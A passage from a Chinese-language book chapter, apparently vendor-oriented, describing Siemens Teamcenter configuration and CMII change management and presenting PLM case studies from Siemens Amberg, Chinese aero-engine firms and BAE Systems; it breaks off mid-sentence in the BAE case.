·TC提供符合CMII标准规范的更改与有效性管理机制,实现问题报告、更改请求、更改通知、更改贯彻执行、反馈总结等完整闭环的构型更改管理能力。 ·TC通过以需求为驱动的集成性产品开发,实现信息端到端的关联与追溯,为构型的验证与审核提供良好的支撑。 ·在TC环境下,实现以需求模型、设计模型和工序模型的方式,支撑MBE企业内MBD模型的一次性定义、多处利用且保持严格的关联性,真正实现单一数据源。 18.3.1 真正的全生命周期平台 构型管理是面向产品全生命周期的,因此构型管理的系统必须尽可能地面向产品全生命周期的业务,涵盖全生命周期数据。 西门子公司通过持续的研发投入和购并策略,打造了TC关于客户需求、产品设计、仿真分析、数字化制造、测试试验、维护服务等产品全生命周期业务的全面能力。TC作为具有这一全面能力的数据和状态管理的骨架,是复杂产品构型管理的良好基础平台: ·构型标识的有效工具:可按照企业自身的管理要求和产品特点,来定义标识产品CI、构型基线、产品编码等;对产品功能特性和物理特性完整表示的构型数据(例如MBD模型、技术文档、标准文档、工艺规程、质量报告、维修报告等)进行编码与命名规则的管理。 ·构型状态纪实的良好容器:按照严格版本和状态控制机制记录着所有的构型数据;通过版本有效性、批架次(台份)有效性、日期有效性,以及变量配置机制,清晰记录着产品CI的所有构型状态以及演变历史;同时通过实做BOM和维护BOM的引入,对于实物产品的构型状态以及演变历史也可进行完整的记录,达到真正的全生命周期的构型管理。 ·构型管理计划编制及管理的有效平台:TC的任务管理工具不仅可以支撑构型管理计划的编制以及进度管理,而且通过工作流方式执行任务并自动更新任务状态,自动提交任务交付物,同时可与相应的研制需求进行直接关联。 18.3.2 最佳的产品配置器 构型管理是随着产品的复杂化、系列化与客户化而出现的,它以企业零部件库为底层支持,以系列化产品的相关数据作为管理对象,以产品结构为核心,在一定的目标和规则约束下向用户和应用系统提供产品结构的不同视图和描述,并组织、协调、控制和管理产品研制全生命周期中的一切活动。支持产品全生命周期内产品BOM管理的配置器成为构型管理的重要能力。 通过为全球顶级的飞机和汽车OEM厂商长期服务,TC不仅构建了通过版本有效性、批架次(台份)有效性、日期有效性等方式的构型状态管理,而且针对系列化、模块化的平台型产品还提供高效的变量配置机制,即通过平台GPS(Generic Product Structure),TC中的平台设计器对产品进行管理和维护,主要涉及产品架构、零部件解决方案及其使用的变量条件,代表产品群的BOM。通过对平台GPS加载SOS选项包(选项包或选项集,一组选项值的集合,用来描述对产品的需求),可以得到满足配置条件的DBOM(在GPS中选定并设置选项值,从而得到满足选定客户需求和技术特性的BOM)。 图18-5所示的变量配置机制可按照系统工程的思想开展产品功能架构的定义、自定向下的设计,可支撑企业产品平台化、型谱化的发展;同时促进企业模块化设计的开展;也能构建直接面向客户或市场的全局选项,加速产品的市场化水平与效率。 图18-5 变量配置机制 复杂产品的OEM企业正在逐步向服务性企业转型,这样做,不仅能够扩展企业的收益,而且由于更加接近客户和产品的使用现场,可促进产品的快速创新与迭代优化。当然这要求企业对实物产品的构型状态能够进行有效的记录。 在TC平台中,经全面拓展的BOM管理的范畴是:从工程BOM和工艺BOM到实做BOM和维护BOM。因此,构型状态的管理与纪实也从虚拟产品阶段走向实物产品阶段:以批次号或序列号作为实物产品的主要标识,用实做BOM完整记录产品首次制造、装配完成的构型状态,包括制造过程中的偏离或超差,以及电子履历或卷宗需要的相关质量证明单等。维护BOM完整记录着实物产品在每次实验拆装或故障维修过程中的构型状态,包括在役状态、更换件情况、时间寿命、备件/串件历史等,即完整记录实物产品的演变历史和构型状态。 实做BOM/维护BOM与工程BOM/工艺BOM保持严格的关联关系:实做BOM/维护BOM是基于工程BOM/工艺BOM而生成的,因此工程BOM/工艺BOM决定着实物产品的构型状态;当产品发生变更或升级,可以追溯到每个实物产品的零组件,快速定位更改的影响或精准推销升级服务;当实物产品发生故障时,也可反向追溯到具体的模型、图纸、工艺或更改单等,查找根本原因。 18.3.3 符合CMII的更改管理 TC提供符合CMII标准规范的更改与有效性管理机制,实现问题报告、更改请求、更改通知、更改贯彻执行、反馈总结等完整闭环的构型更改管理能力: ·更改模型:在众多企业中,更改管理过程只强调更改通知单的编写和审批,几乎忽略了问题产生和更改的执行。而TC平台中构建有问题报告(PR)、工程更改请求(ECR)、工程更改通知(ECN)等业务模型,同时一个PR引发的多个ECR,以及一个ECR同时贯彻的多个ECN统一关联和集中起来管理,以实现某个问题的真正解决方案和解决过程的完整记录;同时系统把发生更改的零组件对象的前后版本、相关信息都通过这些模型与企业关联,以利于问题的准确解决。 ·更改流程控制:在TC系统中,通过工作流机制把“PR→ECR→ECN→贯彻执行”过程贯穿起来,通过图形化的方式把整个执行过程和发放状态透明化;同时提供相应的预警机制,加速问题的解决。 ·更改影响分析:在TC系统中,通过系统信息关联性,不仅可以快速定位每个问题影响到的相关联零组件或产品,也可快速定位相关联的人员,以便他们进行快速的沟通;同时由于系统对实物构型的完整记录,也可快速分析问题对实物产品的影响范围,快速找到对在制、在役产品的解决办法。 ·更改有效性控制:系统通过可定制的版本规则详细记录每次更改的结果;对于每个更改生效的范围可进行精准的定义,并通过更改有效性来驱动CI的演变,记录生效状态。 ·更改质量分析:上述的更改模型完整记录了问题的信息和解决方案的执行过程,通过TC的CAPA质量管理功能,能够及时分析、展示问题的根本原因和问题的解决状态,帮助企业从根本上控制问题的产生,提高解决问题的效率。 符合CMII的更改管理过程如图18-6所示。 图18-6 符合CMII的更改管理过程 18.3.4 端到端的关联与追溯 在西门子TC产品全生命周期管理平台中,提供以需求为驱动的集成性产品开发的完整环境,实现信息端到端的关联与追溯,为构型的验证与审核提供良好的支撑: ·需求的分解分配:根据客户接收的需求,再结合产品的行业、政府、环境法规,以及企业自身追求精益产品的规范要求,构成产品研发的全部需求。这些需求包含产品本身的设计功能需求、制造需求、实验验证需求、产品维护维修需求等,都可逐一分解到功能单元、每个零组件,甚至每个制造活动和维护活动中。TC系统可结构化地管理这些需求,并把这些需求分配到对应的功能单元、零组件或具体任务活动中。 ·信息的紧密关联:从需求的分配开始,需求可逐步与项目计划中的任务、产品功能架构的功能单元、产品结构中的具体零组件、具体的工艺规程结构、具体的实物验证机或交付品等产生特定的关联关系;在TC系统中,这些需求通过某种特定的关联关系、装配关系、实现关系(虚拟产品与实物产品的关系)进行有效地关联,这些关联关系在具体业务活动实际发生关联时逐步建立。 ·信息的正反向追溯:在TC系统中,通过关系浏览器能够深度和可视化地展现这些关联关系。因此可从需求一直追溯到实物产品,彻底分析每个需求是否都有对应实现的对象,即对需求分配的完整性进行校验;同时也可通过实物产品反向追溯到需求,反查每项活动是否完全满足需求;还可彻查所有的需求是否得到了实现,即对需求的符合性进行校验。因此基于上述的机制,TC对企业实施构型的验证和审核提供了高效的支撑。 18.3.5 MBD模型的单一数据源 在MBE企业,模型将是表述产品构型信息的关键数据,因此管控模型的版本有效性状态,尤其是模型之间的关联关系,将是构型管理的重要内容之一。在TC环境下,实现以需求模型、设计模型和工序模型的方式,支撑MBE企业内模型的一次性定义、多处利用且保持严格的关联性,真正实现模型的单一数据源,更加有利于更改控制。 ·需求模型:正如前面章节所阐述,需求一旦被定义成分解,就会被分配并关联到其他构型数据,包括设计模型(MBD)和工序模型(In-process)在内。需求模型是产品研发的主线,贯穿并串联产品研发的所有构型项和构型数据。 ·设计模型:MBD模型不仅能完整地表达产品与零组件的定义,而且MBD模型能够直接用于进行强度、疲劳等多方面的分析;同时基于MBD模型产生的JT轻量化模型可以用于数字化样机、数字化预装配与仿真、维护维修仿真分析,甚至是嵌入式工作台或工厂的仿真分析,以及IETM交互式电子技术手册等。当MBD模型更新后,这些后续过程产生的模型都可自动更新。 ·工序模型:通过WAVE技术,基于MBD模型可以创建工序模型,这些工序模型可以直接用于MBD零件工艺规程、数控编程、检测编程,也可用于切削运动仿真、机床运动仿真,以及其他基于工序模型的工艺仿真。当MBD模型更新后,在这些过程中使用的模型都可自动更新。 18.4 效益 TC作为全球领先的产品全生命周期管理平台,通过其强大的产品配置器、更改管理和全生命周期的信息追溯与管理的能力,为业界提供了最为完善的复杂产品构型管理方案,帮助企业高效自觉地履行构型管理的5大功能和37个原则,它的价值是: ·提供业界最全的产品全生命周期平台,真正涵盖全生命周期业务与数据,为面向全生命周期的构型管理奠定坚实基础。 ·适用于汽车和飞机产品架构管理的最佳产品配置器,能高效支撑复杂产品的全生命周期BOM管理。 ·严格符合CMII的更改与有效性管理机制,有效贯彻了构型管理标准。 ·以需求驱动的信息端到端的关联与追溯,实现了信息系统对构型管理范畴从虚拟产品到实物产品的拓展,达到全生命周期的构型管理。 ·通过对MBD模型的有效关联与高效重用,真正实现MBE企业内MBD模型的单一数据源,确保模型的技术状态有效管控。 总之,基于西门子TC的复杂产品的构型管理方案,以业界最全面和最具体的方式把构型管理的过程与原则落实到复杂产品的全生命周期业务过程中、每个业务人员的业务活动中、每个活动的业务数据中。构型管理科学还在持续发展,西门子复杂产品的构型管理方案也会持续优化,永无止境。 实践篇 TECNOMATIX Tecnomatix通过将所有制造规范与产品工程设计(包括流程工程和仿真以及生产管理)联系起来实现流程创新。Tecnomatix全方位数字化制造解决方案组合利用Teamcenter软件提供无与伦比的产品和生产集成,有助于制定更明智的决策、提高产品质量和加快生产速度。利用开放式架构,Siemens PLM Software通过开放式集成提供世界一流的解决方案,从而缩短了交付时限,提高了制造规划工作的准确性。通过将产品、流程、资源和工厂数据紧密联系在一起,制造商可以运用在数字化制造领域中被公认为领先技术的全套流程导向型功能。作为强健的PIM战略的重要组成部分,Tecnomatix以一种完全关联的数据模型对制造流程的设计和执行进行管理,弥补了产品设计与产品交付之间的差距。Tecnomatix是延续产品生命周期数字化的关键一环,有助于制造商更快地将更具创新性的产品推向市场,利用全球化生产运作的优势,提升生产效率,保持优良品质和提高利润率。 加快产品上市速度 。Tecnomatix解决方案可以优化那些决定产品快速上市能力的业务流程。从产品开发到产品交付的过程中,Tecnomatix可以使制造能力和产能与设计意图协调起来,从而减少交付周期较长的流程,有助于实现溢价,获取更多市场份额,并提升品牌价值。 复杂性管理 。制造环节产生的数据量远远多于工程设计环节,但这两个环节之间的相互关系对新产品开发和投产至关重要。借助Tecnomatix,可以在整个规划过程中同时利用产品的变更、更新和依赖关系,从而获得经过验证的制造计划来确保第一次就达到高质量。 提高生产效率 。制造在公司成本中所占的比例最大,也是供应链中成本最高的环节。这项投资超过了对实物资产、人力资源和占地面积的投资。制造规划、流程分析、高散仿真、原型设计和数字样机都是制造投资的重要因素。Tecnomatix可以让企业在多个产品计划中利用这些投资,大幅削减生产成本。 优化生产战略 。面对全球商机,许多公司都在将工作重心放在外包制造方面。但是,由于不能有效地交换信息,涉足外包业务关系的公司往往表现不佳,Siemens PLM Software提供了所需的解决方案,可以转变制造外包战略,还可以通过整合资源来汲取来自各个方面的创新,之所以要特别关注产品制造的各个细节,原因在于质量问题和保修成本会迅速降低利润率,并影响客户的满意度。Tecnomatix可在从规划到实际制造时数据需求的各个环节促进完整产品和流程谱系的形成以及对所有产品的跟踪,以此促使在整个流程中提升质量、明确流程责任并符合合规要求。 案例一 西门子EWA数字化工厂 业务挑战 ·产品数量众多,并有许多针对特定客户的类型。 ·成本和上市时间压力日益沉重。 ·制造部门分布于全球各地。 业务举措 ·整体的数字化工厂实施战略。 解决方案 ·Teamcenter。 ·Tecnomatix。 ·NX。 ·SIMATIC IT。 ·TIA(西门子全集成自动化)。 ·ERP。 实施效益 ·在世界各地的制造部门之间建立了标准化的规划流程。 ·在制造地点和产品推出方面,拥有一致的数据作为决策依据。 ·加强了对于制造流程变更的控制。 ·大幅提高了产品的质量和用户满意度。 西门子是世界领先的生产、运输、照明和建筑技术供应商。西门子工业领域下属的工业自动化(IA)部门拥有一整套自动化产品、解决方案和服务组合。西门子在安贝格工厂包含两个事业部:一为西门子生产电子与控制部件(EWA),主要产品包括SIMATIC控制器、SIMATIC HMI、分布式SIMATIC I/O等多个类别。二为全球市场设计和制造低压电路产品、SIRIUS(用于电动机的开关、保护和检测)等系列产品提供多种高科技解决方案,以应用于自动化和传动、测量和控制以及医学领域。 这些产品对西门子客户的成功起到了决定性的作用,并且应用范围广泛,因此很有必要设立不同的产品线和多种批量。同时,这些产品还必须具有高度的耐用性和专为满足特定客户的要求而提供的设计。 IA CE生产地除了德国的两个地区外,还包括IA在世界各地设立的其他29家工厂。规划部门由大约60名成员组成,负责协调全球各处工厂的制造流程,需要照应从预加工(例如注塑模和冲模/折弯流程)、装配体制造(用于磁体和线圈)到最终装备的整个价值链。从简单的手工制造到高度复杂的集成化生产线,生产方法十分多样。企业会根据所需的人员和材料投资以及各地的采购条件,决定在何处进行制造。 数字化工厂生产的产品 数字化工厂成功之路 EWA工厂包含多条高速柔性SMT生产线,并集成了测试过程和装箱打包流程,工序的操作较为复杂,工步较多,且对产品质量有严格要求,为了达到整体产品的六西格玛质量要求,在生产过程中对每个工步在六西格玛质量要求方面更严格。因此,为了达到如此严格的质量要求,管理层决定将数字化工厂战略分布推进,最终包括如下内容: ·减少加工流程的变化率,实现设计、制造、质量等环节的协同; ·在产品零部件级收集详细的生产和可追踪的数据,提高数据源的起因分析; ·从设计到制造过程中的数字指令和流程的跟踪分析,完整展现误差和错误的过程并分析; ·工序和质量的闭环测试,尽可能消除人工错误问题。 西门子安贝格工厂一直将质量放在首位,管理层也一直以提高产品质量和给客户带来更完美的体验为目标,为了达到目标,他们持续不断地研究市场中出现的新技术,并对这些新技术进行综合考虑,提出了符合该工厂的成熟的数字化工厂整体愿景,包括PLM、MES、SCM、CRM以及Plant Culture/Sustainability等方案。 数字化工厂愿景 对于工厂操作复杂、产品类型广泛的安贝格工厂来说,这条途径是非常有必要的,EWA工厂每年生产的西门子工业自动化器件总计达到16亿件以上,生产每个元器件的时间是1秒,并且还得保证这些器件的质量能够超越工业自动化的普通标准,即使最复杂环境也能胜任,这对EWA工厂也是挑战。 为了达到设定的目标并且贯彻高水平的企业战略,企业制定了一个完整的长期规划,其核心就是提高产品的质量。该计划从1990年开始实施,最初,生产、质量、物料以及产品设计完全靠人进行手工处理,此时的产品DPMO(Defect Per Million Opportunities,百万机会的缺陷数)几乎达到600。经过该战略的逐步推进,企业实施PLM、MES、物料自动化管理等方面后,到2007年,工厂生产的产品的DPMO达到了24,并且在该年被法国商学院授予“欧洲最佳工厂”荣誉。 安贝格工厂并没有因取得的荣誉和成绩而沾沾自喜,工厂的管理层在2007年继续将数字化工厂的理念向前推进,决心实施完整的数字化工厂策略,改进的内容包括: ·继续加大生产,增加数字化网络中的机器数量; ·提高产品和生产数据自动收集水平; ·提高制造过程的精细透明度; ·将制造系统与质量数据以及ERP进行集成; ·提高车间加工与操作的实时可视化水平; ·通过集成PLM和MES,提高DFQ水平。 数字化工厂质量性能表现 需要说明的是,工厂的管理层认为从2007年到2010年产品质量性能有了不断的提升,DPMO从24降低到17,工厂的收入也在逐年增长,并没有因为金融危机而受到冲击。到2012年,企业产品质量DPMO达到14,质量合格率达到99.9986%,这一切都和实施数字化整体战略应对商务处理以及基于该策略的技术完整交付有重要关系。 虽然规划流程通常会产生同样的数据,但在过去,不同的规划人员会以不同的方式呈现信息。“我们面临的挑战是,要给制造规划人员提供一种更系统化的工作方式,这对我们这样的领军型工厂显得尤其突出。”德国安贝格工厂的制造规划员Peter Engelhardt表示,“我们原先的流程只具有最低的数据集成度,因此会造成一些额外的工作量,而且需要安排人手来跟踪规划工作并提供关于规划成果的证明。” Engelhardt担任负责“数字化工厂”举措的项目经理。这一举措有两个目的:一是大幅度减少进行产品变型的制造规划所需的工作量,二是以更高的效率处理日益增长的工作负载。另外,该业务部还希望提高各个项目的报告质量,这对于管理层的决策至关重要,而且有助于员工理解生产流程的变更。西门子工业领域工业自动化部旗下的低压控制配电业务部全球制造主管Rudolf Gied说:“数字化规划的作用与数字化工程相当,是一种合理而必要的选择。” 为了达成这些目标,西门子工业领域的IA业务部从Siemens PLM Software购买Tecnomatix数字化制造解决方案,实施了Tecnomatix装配规划和验证解决方案以及厂房设计和优化解决方案。从实验阶段开始,到最终的一整套需求清单,Siemens PLM Software采用了一种循序渐进的方法,近乎完美地满足了这些要求。另外,EWA还购买了西门子的制造智能软件,以收集、分析并实时查看生产和质量数据。 借助Tecnomatix中的装配规划和验证功能,可以评估制造方法,计算生产成本,调度各类资源,并且检查资源利用率。成本分析以及对不同的生产方案进行的比较分析可以作为选择制造地点的依据。三维的制造布局提供了工厂的概览图,最终的规划成果通过详细的仿真加以确认和验证。该解决方案的功能涵盖装配评估到拆卸评估和人体工程学检查,范围十分广泛。 装配规划和验证 在经过周密布置的三维图表中,对装配流程进行了验证和规划,厂房设计和优化解决方案提供了进行物料元素仿真和执行瓶颈分析所需的工具。装配规划解决方案是所有制造规划人员的标准工具,而仿真解决方案则供专家使用。“将这两种解决方案结合起来,我们就能在与仿真专家共享数据的同时,满足团队对同一数据的要求。”Engelhardt解释说。 从技术层面上看,EWA的数字化工厂策略是超前的,其踏上数字化工厂之旅首先从实施SIEMENS MES开始,其后引入了Siemens PLM管理平台和数字化制造平台以实现工厂的跨部门协作,在此之后该平台实现了与ERP系统的连接,使之成为一个完整的数字化工厂平台,PLM、MES、ERP、MOM等各系统的连接和交互达到了一流水平。 有益的经验 曾经有一个项目对某种极为新颖的物料流概念做出了规划,证明了Tecnomatix解决方案的价值。首先,工厂的概念是以仿真模型来开发的。通过创建尺寸缓冲,可以对工厂的性能进行优化。为了实现这一目的,仿真软件提供了全面的二维和三维分析选项,并因此发现了几处瓶颈。消除了这些瓶颈后,整个工厂的物料流实现了平衡。下一步是为每天制造50000部设备的产能建立一套物流系统,这项工作包括对运营和生产计划进行验证。 “我们拥有非常精确的数据,如果没有数字化工具,我们做不到这一点。”德国安贝格工厂负责制造和测试规划的部门主管Peter Biersack反映,“我们能够以高度的可靠性和准确性进入实施阶段。”现在,借助内部仿真模型,可以对物料仓库进行优化,确保所有变型都随时可用。 这一有益的经验告诉我们,通过引入数字化规划工具,制造规划人员向着数字化工厂的概念迈出了重要的一步。有了Tecnomatix,安贝格工厂的制造规划人员就成为数字化工厂的潮流领导者。 成都SEWC工厂 EWA数字化工厂的成功模式,开始移植到中国成都的SEWC工厂。SEWC与EWA属于姊妹厂,于2013年9月开始正式运营。西门子成都工厂的运营,为中国企业树立了数字化工厂的成功典范,并将西门子数字化工厂解决方案真实地展现给中国企业。 西门子成都数字化工厂 案例二 中国燃气涡轮研究院:动力源于内在数据有效管理 业务挑战 ·从二维设计升级到三维设计,促进虚拟装配、干涉检查和数字样机分析。 ·改善协同,消除信息孤岛。 ·全面利用电子图文档数据和纸介质图纸,保障内容一致性。 ·重用零件数据,消除设计冗余。 成功关键 ·分阶段部署NX和Teamcenter软件。 ·促进自上而下的最佳设计实践。 ·使整个新产品开发环境实现全面自动化。 实施效益 ·基于NX的并行设计,完成了各专业所负责的所有零件的三维实体造型和二维工程图的设计,完成了各组件的虚拟装配。 ·所有零部件数据都储存在服务器上,便于查找和使用,构建了基于各专业装配的单元体模型,建立了完全基于真实数据的数字样机。 ·建立了产品数据库,为产品设计提供了可高效利用的共享资源,解决了电子文档与纸质文档不一致的问题。 ·BOM自动生成,大大减少了主管设计师的工作量,避免了人工输入容易出错的现象。 ·实现了电子图文档的网上审批、更改控制与版本管理,构建了异地协同设计系统,保障了产品开发流程的顺畅,增强了工程技术人员的协同与合作。 中国燃气涡轮研究院通过以产品为核心的信息集成、过程集成,提高业务管理水平和生产效率。 提供产品研发核心技术 中国燃气涡轮研究院(CGTE)成立于1965年,是中国航空动力行业最重要的核心科研、产品开发和整机鉴定测试机构之一。作为中航工业发动机公司的成员,中国燃气涡轮研究院为燃气涡轮技术的发展做出了相当大的贡献。在过去的20年中,中国燃气涡轮研究院还充分利用自己在航空航天业的经验,先后开发了电子机械、汽车制造加工机械、轻工机械、计算机软件等民用机械产品。中国燃气涡轮研究院的很多技术举措推动了先进机械产品的开发,其中很多填补了国内空白。 突破业务开发瓶颈 随着产品开发任务不断增加以及CAD技术的发展,中国燃气涡轮研究院对新产品开发工具和产品数据管理(PDM)的需求日益迫切。传统的二维设计不能全面满足中国燃气涡轮研究院对产品信息的需要,无法提供CAE和CAM需要的有效实体模型,也无法提供虚拟装配、干涉检查以及数字样机分析所需要的高级功能。另外,由于中国燃气涡轮研究院的电子产品数据越来越多,原来采用的人工数据管理技术显然已经不再适用。 在中国燃气涡轮研究院的工程团队内,人工管理方法引起的问题尤其明显,不便的数据检索方法、过多的零件重复设计以及在修改和发布过程中电子文档和纸介质图纸之间严重的不一致现象对设计和生产效率均造成了负面影响。 鉴于这些问题,2006年年初,中国燃气涡轮研究院在选用NX三维设计系统的同时决定上马PDM项目。中国燃气涡轮研究院的目标非常明确,就是要通过这样一套系统,建立起先进的数字化产品开发管理体系,提供更好的设计工具,并且满足工程组织的设计协同要求,尤其是文件查询、版本管理、安全、保密以及数据共享方面的要求。 着眼行业特色的实施应用过程 中国燃气涡轮研究院PDM总体结构主任伏宇表示:“其实我们当初选择实施CAD系统和PDM系统的原因十分简单,就是要把自己的产品数据管理起来。”为了更好地管理前端三维设计系统及其PDM解决方案,促进与同行业中其他企业之间的无缝合作,中国燃气涡轮研究院决定选择Siemens PLM Software公司的NX和Teamcenter来搭建其PLM平台。 2006年,中国燃气涡轮研究院完成了PLM项目一期工程的实施,将其设计系统过渡到NX,实施了产品设计数据管理、设计数据版本控制、过程管理、权限管理和组织结构管理等关键功能,在企业中全面采用实体建模、虚拟装配和数字样机制作。 中国燃气涡轮研究院于2007年启动了PLM项目二期工程,在两个地方建立了一个企业级PDM数据库,以便不同地域的用户组可以访问相同的设计数据,从而使公司实现了多站点协同、公共工作流过程以及更快的数据传输。同样重要的是,中国燃气涡轮研究院的PDM二期项目采用了“全局最新有效”和“局部精确版本”两种机制,一方面把握了全局产品数据版本的有效性,同时也兼顾到了某些局部零部件的版本即时有效性。针对“变更管理”,二期项目通过对Teamcenter系统进行二次开发,使其可以根据更改创建更改通知单。由用户手动填写更改文件号、更改文件名称、更改原因和更改类型等信息,并发起更改通知单的流程,完成更改管理功能。 在PLM项目二期实施过程中,中国燃气涡轮研究院与Siemens PLM Software的专家密切合作,专门搭建了测试系统环境并为整个产品开发系统完成了行业特定的模板、组织结构、应用软件特定的工作流、业务规则、分类以及其他功能的二次开发。 实现了战略运营优势 在成功完成了PLM实施项目的头两期之后,中国燃气涡轮研究院实现了行业领先的战略过程优势。对于中国燃气涡轮研究院的整个产品开发周期自动化计划而言,NX-Teamcenter PLM实施项目产生的所有改进都非常关键。伏宇表示,“经过实施和应用NX和Teamcenter,我们的产品开发系统、对产品数据的管理,乃至对产品开发流程的控制,都取得了很好的成绩,我们都很满意。” 通过把NX作为“自顶向下”开发方法的基础,中国燃气涡轮研究院的各个过程均实现了有形收益。三维数据现在已经得到全面利用,从而大幅减少了工程设计阶段的工作量,产生了创新性的高价值设计,并且实现了对整个开发作业的严格控制。 通过使用Teamcenter,中国燃气涡轮研究院的各个团队现在可以即时交换产品数据,重用更多的设计和文档,并且显著减少了重复的零部件数量。管理层现在能够实时掌握整个项目状态,包括各项工作任务的执行情况,从而大幅降低了开发成本。另外,Teamcenter还促进了在线电子设计/文档审批、更改控制和版本管理以及BOM的自动生成。 不仅如此,Teamcenter还能够执行中国燃气涡轮研究院的各项技术标准和规格,这是Teamcenter带来的一项非常重要的收益。要实现向客户提供最高质量产品的目标,实现管理层制定的力争行业领袖的目标,关键在于严格执行这些标准。 案例三 黎明公司的新产品开发引入了精益计划 业务挑战 ·建立一个精益企业。 ·降低成本。 ·缩短产品开发周期。 ·提高质量。 成功关键 ·从设计到制造统一使用数字化模式。 ·使用产品全生命周期管理解决方案(PLM),可以达到以下目的:增进工程/制造协同;完善整个企业的信息流;提高知识的再利用率。 业务举措 ·新产品开发。 ·生产效率。 解决方案/服务 ·NX。 ·Teamcenter。 ·Tecnomatix。 PLM技术为中国飞机发动机制造商的转型奠定了基础。沈阳黎明航空发动机(集团)有限责任公司的使命是,把自己转变成为一个结合新思维、新价值和先进信息技术的精益企业。 国有企业正经历着转型 沈阳黎明航空发动机(集团)有限责任公司(以下简称“黎明公司”)始建于1954年,是中国第一家喷气式飞机发动机制造厂,也是中国重点工程项目之一。黎明公司现拥有10000多名员工,业务范围包括飞机发动机、外购非航空零部件、燃料发动机和钢铁产品的生产和维修。 黎明公司目前正处在迈向精益企业的转型过程之中。在以前,这家国有企业的产品开发过程的特点就是串行式工作流,即使用和传递纸张文件。而且,人事组织效率低下,采用统一分配式人事制度;信息技术系统过时落后,并且缺少协同。在精益计划精神的指导下,黎明公司的管理层开始研究一些国际领先的国防和航空公司的战略。他们还在精益计划下制定了一些具体目标,包括在整个企业实现更好的信息流运作,优化利用制造资源,降低产品开发成本,缩短产品开发周期和提高产品质量。 PLM技术支撑起精益计划理念 黎明公司的管理层认识到,如果要把理想变为现实,就必须同时应用先进的信息技术。这就是黎明公司实施Siemens PLM Software公司的PLM解决方案的原因所在。黎明公司的管理层认为,PLM解决方案是保证他们成功实现转型的关键。通过使用NX、Teamcenter和Tecnomatix等企业级解决方案,黎明公司加快了其转型过程。沈阳黎明航空发动机(集团)有限责任公司副总裁许柏林说:“黎明公司知道PLM和数字化制造技术对于优化产品生命周期过程的价值和重要性。黎明公司拥有必要的技能和经验,可以把现有的市场机遇转化成资本。PLM解决方案可以使我们抓住市场机遇,这一点非常重要。Siemens PLM Software公司和黎明公司之间成功合作的历史长达十多年,而且考虑到现在Siemens PLM Software公司是同类公司中的佼佼者,采用开放式的解决方案,并致力于为中国客户提供一流的支持服务,我们认为,Siemens PLM Software公司很显然是我们最佳的PLM合作伙伴。” 项目小组主要由黎明公司的员工以及Siemens PLM Software公司的本地和国际专家组成,主要负责调试和实施PLM解决方案。整个过程是分成几个阶段进行的,首先是为期4个月的最初评估阶段,Siemens PLM Software公司在此阶段帮助黎明公司确定了PLM解决方案的特定要求。然后,由黎明公司负责在几个不同的地方实施试点项目。在试点项目取得了成功之后,黎明公司又开始在整个公司范围内实施PLM解决方案。许柏林说:“我们预计,在这个项目完成之后,我们的生产能力可以提高20%~50%。” 转型带来了成果 黎明公司新的产品开发过程是建立在一种统一的数字化产品模式之上的,该模式是在设计阶段由NX创造的。在下游作业(包括制造作业)中,这一模式将获得一定的支持,如Tecnomatix软件的支持,以进行制造作业。Teamcenter可以提供产品知识管理功能和协同基础设施,并帮助黎明公司在可管理的开发环境下获得产品和设计信息。举例来说,在这种解决方案开放式的集成环境下,黎明公司可以把其生产工作同沈阳航空发动机研究所的设计工作更紧密地结合起来。 实施PLM解决方案为黎明公司带来的最明显好处就是信息检索速度变得更快了,另外一个好处是数据共享变得更方便了。这两个好处都是使用Teamcenter数字化生命周期管理系统替换以前制造过程的直接结果。另外,通过实施PLM解决方案,产品开发过程也得到了改进,这个效益是可以衡量的。例如,更改设计所需的时间减少了48%,流程规划时间(包括批准周期)减少了一半,夹具开发时间则缩短了51%。在PLM系统得以完全实施之后,余下的就是把PLM系统和公司的企业资源计划(ERP)以及装配流程规划系统整合在一起。作为新产品开发计划的基础设施,PLM技术正在黎明公司迈向精益企业的转型过程中发挥着日益关键的作用。 案例四 BAE:加快英国陆军野战队急需的功能强化和紧急变更 业务挑战 ·降低原型阶段的错误风险。 ·避免成本和时间超限。 ·杜绝模棱两可。 成功关键 ·快速加载模型和数据。 ·使用ISO标准的JT轻量数据。 实施效益 ·制定更好的决策。 ·尽早识别并解决冲突。 ·与以前的流程相比,短时间内可以访问更多的概念和变量。 ·节约的成本和时间可量化。 ·进一步提升公司能够满足紧急作战需求的名声。 解决方案/服务 ·JT Open。 ·NX。 ·PLM Components。 Teamcenter驱动3D VR Dome,使工程师和野战车队人员能够展示实际大小的模型;通过虚拟协同推动创新、加快验证并降低成本。 综合地面系统 如今,对于那些致力于为要求苛刻的军方提供支持服务的公司而言,最大的挑战之一是按时、按预算地交付军事能力。现代地面系统更加复杂,必须能满足要求最严苛的工作条件。因此,车辆、动力系统、系统以及武器装备的组合必须一次性取得成功。 BAE Systems是经过验证的行业专家 BAE系统全球作战系统(Global Combat Systems,GCS)为陆军提供平台、系统及其全生命周期功能管理服务。在英国,GCS交付增强的军事能力、满足紧急作战需求并更新项目计划。该公司致力于为智能弹药、火炮系统、战车炮塔、舰炮以及高射炮系统等提供智能武器系统的制造、开发、市场营销和维护服务,并为轻武器、迫击炮、坦克以及陆军和海军火炮等提供弹药。 全球作战系统还提供战车的设计、制造、集成和支持服务,主要产品和服务包括主战坦克、步兵战车、工兵装甲车、装甲越野车、军事搭桥及物流支持。 应用先进技术 GCS的系统集成设施(Systems Integration Facility)帮助工程师和车队人员保持合作,共同开发英国陆军现役主战坦克、步兵战车及装甲运兵车舰队所需的增强功能及紧急变更。此外,系统集成设施还负责设计和演示战车概念和系统集成能力,以满足未来的需求。系统集成设施的核心是三维可视化实验室(VR Dome),利用Presagis的Vega PrimeTM 可视化软件和Siemens PLM Software的Teamcenter® 软件,展示实际大小的全特征三维立体虚拟模型。 排除风险 系统集成设施由多个实验室组成,包括:作战系统集成实验室(CSIL)、VR Dome、两个电子系统集成实验室(ESIL)以及车辆系统集成实验室(VSIL)。该设施的目的是为公司的系统工程过程排除风险。为了避免超出成本和时间限制,至关重要的是在原型阶段之前先检测到错误,以尽量减少建立原型期间出现问题。GCS的系统工程管理计划为实现此目的奠定了基础。GCS地面系统集成设施经理David Vallis解释道:“根据系统工程管理计划,我们从国防部接到用户需求后对它们进行分析并制定需求规范,然后再制定子系统需求规范,完成架构设计。购入或制造出子系统后,便对它们进行集成、测试,并安装到车辆上。最后,我们还要再进行测试,向客户证明我们的车辆满足了他们的要求。” Vallis补充道:“虽然每阶段都有检查点,但这是个高动态流程,不断会有变更或更新,很可能直到流程后期一切才确定下来。而这正是VR Dome存在的价值。” 360度无缝全景图 GCS拥有多个VR Dome,每个VR 